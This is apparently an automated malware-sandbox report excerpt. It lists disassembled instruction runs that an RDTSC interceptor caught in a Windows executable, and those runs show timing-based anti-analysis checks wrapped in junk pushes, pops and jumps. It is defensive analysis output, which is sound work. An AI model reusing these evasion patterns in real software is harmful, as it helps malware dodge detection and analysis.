0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FC22CC1B8B3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140617 second address: 514061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514067C second address: 51406AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FC22CC1B8B7h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8ABh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51406AC second address: 51307F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 popad 0x0000000a je 00007FC29EB0CC5Bh 0x00000010 xor eax, eax 0x00000012 jmp 00007FC22CFF83FAh 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 mov esi, eax 0x00000024 xor ebx, ebx 0x00000026 cmp esi, 00000000h 0x00000029 je 00007FC22D01EE05h 0x0000002f call 00007FC2317CB4F7h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51307F0 second address: 5130803 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC22CC1B8AAh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130803 second address: 513083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FC22D01ECD6h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22D01ECD7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 513083D second address: 5130879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC22CC1B8ABh 0x0000000b xor esi, 0B459B0Eh 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130879 second address: 513087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 513087D second address: 5130883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130883 second address: 51308DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD0h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov esi, 34900AC9h 0x00000015 pushfd 0x00000016 jmp 00007FC22D01ECD6h 0x0000001b sbb eax, 25B9F718h 0x00000021 jmp 00007FC22D01ECCBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, 655FDCE1h 0x00000031 mov cx, 661Dh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140A99 second address: 5140AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140AA9 second address: 5140AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140AAD second address: 5140B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8B8h 0x00000013 jmp 00007FC22CC1B8B5h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC22CC1B8B0h 0x0000001f jmp 00007FC22CC1B8B5h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140B11 second address: 5140B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140B17 second address: 5140B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [76C8459Ch], 05h 0x00000012 jmp 00007FC22CC1B8B6h 0x00000017 je 00007FC29E6F9758h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 13067270h 0x00000025 jmp 00007FC22CC1B8B9h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140C98 second address: 5140C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140C9E second address: 5140CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D27 second address: 5140D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCEh 0x00000008 call 00007FC22D01ECD2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FC29EAF28FDh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D59 second address: 5140D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D5F second address: 5140D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A7A second address: 5150A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A7E second address: 5150A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A84 second address: 5150AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC22CC1B8B0h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov bx, 3D80h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a mov bl, al 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150AB8 second address: 5150B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC22D01ECD3h 0x0000000b adc ecx, 2DD8A55Eh 0x00000011 jmp 00007FC22D01ECD9h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], esi 0x0000001b jmp 00007FC22D01ECCEh 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, di 0x00000029 pushfd 0x0000002a jmp 00007FC22D01ECD9h 0x0000002f and esi, 1E5BD4F6h 0x00000035 jmp 00007FC22D01ECD1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150B3F second address: 5150B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov eax, 3DEF4973h 0x00000011 mov di, cx 0x00000014 popad 0x00000015 je 00007FC29E6E90FDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150B6E second address: 5150B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150CE9 second address: 5150D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 651DFBB second address: 651DFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC22D01ECC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2E6A second address: 66A2E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2E73 second address: 66A2E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A21B0 second address: 66A21E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22CC1B8B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A21E3 second address: 66A21FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2391 second address: 66A239B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A250D second address: 66A253E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FC22D01ECC6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC22D01ECE0h 0x00000017 jnl 00007FC22D01ECC6h 0x0000001d jmp 00007FC22D01ECD4h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26BF second address: 66A26C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26C3 second address: 66A26EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC22D01ECC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26EB second address: 66A26EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26EF second address: 66A26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A47CE second address: 66A47D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A493E second address: 66A4A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD7h 0x0000000a popad 0x0000000b nop 0x0000000c jng 00007FC22D01ECC9h 0x00000012 mov cx, di 0x00000015 push 00000000h 0x00000017 call 00007FC22D01ECC9h 0x0000001c jno 00007FC22D01ECCAh 0x00000022 push eax 0x00000023 jc 00007FC22D01ECD4h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d push ecx 0x0000002e pushad 0x0000002f jmp 00007FC22D01ECCAh 0x00000034 push eax 0x00000035 pop eax 0x00000036 popad 0x00000037 pop ecx 0x00000038 mov eax, dword ptr [eax] 0x0000003a jo 00007FC22D01ECCEh 0x00000040 jo 00007FC22D01ECC8h 0x00000046 pushad 0x00000047 popad 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d jmp 00007FC22D01ECD3h 0x00000052 pop eax 0x00000053 pop eax 0x00000054 mov dword ptr [ebp+122D3B1Fh], ecx 0x0000005a mov edx, ecx 0x0000005c push 00000003h 0x0000005e mov cx, bx 0x00000061 push 00000000h 0x00000063 mov edi, 4C140527h 0x00000068 push 00000003h 0x0000006a call 00007FC22D01ECD0h 0x0000006f mov edi, dword ptr [ebp+122D2F7Dh] 0x00000075 pop esi 0x00000076 push 5FD3E9ECh 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jbe 00007FC22D01ECC6h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4A08 second address: 66A4A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC22CC1B8A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 add dword ptr [esp], 602C1614h 0x0000001a mov ecx, dword ptr [ebp+122D2ED9h] 0x00000020 lea ebx, dword ptr [ebp+1245A6B2h] 0x00000026 mov dword ptr [ebp+122D36AAh], ecx 0x0000002c xchg eax, ebx 0x0000002d push edx 0x0000002e push edi 0x0000002f je 00007FC22CC1B8A6h 0x00000035 pop edi 0x00000036 pop edx 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC22CC1B8B0h 0x0000003f jmp 00007FC22CC1B8B9h 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AE8 second address: 66A4AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22D01ECC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AF3 second address: 66A4AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AFD second address: 66A4B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edx, dword ptr [ebp+122D2CBDh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d stc 0x0000002e mov dword ptr [ebp+122D3A72h], esi 0x00000034 sub dword ptr [ebp+122D3ACCh], eax 0x0000003a push ADF7B0D2h 0x0000003f pushad 0x00000040 je 00007FC22D01ECCCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4B4D second address: 66A4B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4C33 second address: 66A4C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6695CE6 second address: 6695CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C4D53 second address: 66C4DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FC22D01ECCDh 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC22D01ECD6h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C4DA9 second address: 66C4DAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5173 second address: 66C5182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FC22D01ECC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C52ED second address: 66C52F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C547E second address: 66C5483 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5973 second address: 66C5991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22CC1B8B4h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E42 second address: 66C5E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E4D second address: 66C5E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E6F second address: 66C5E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E74 second address: 6689E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E78 second address: 6689E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E87 second address: 6689E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E8D second address: 6689EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22D01ECCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC22D01ECCCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EB3 second address: 6689EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EB7 second address: 6689EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EBB second address: 6689EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EC1 second address: 6689EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EC9 second address: 6689EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC22CC1B8AEh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FB3 second address: 66C5FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FB9 second address: 66C5FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FBF second address: 66C5FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FC3 second address: 66C6013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8B5h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC22CC1B8B7h 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6928 second address: 66C6940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6940 second address: 66C6960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6960 second address: 66C696B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA7DC second address: 66CA7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA7E1 second address: 66CA7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C97EC second address: 66C9808 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC22CC1B8A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA992 second address: 66CA9A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC22D01ECDBh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
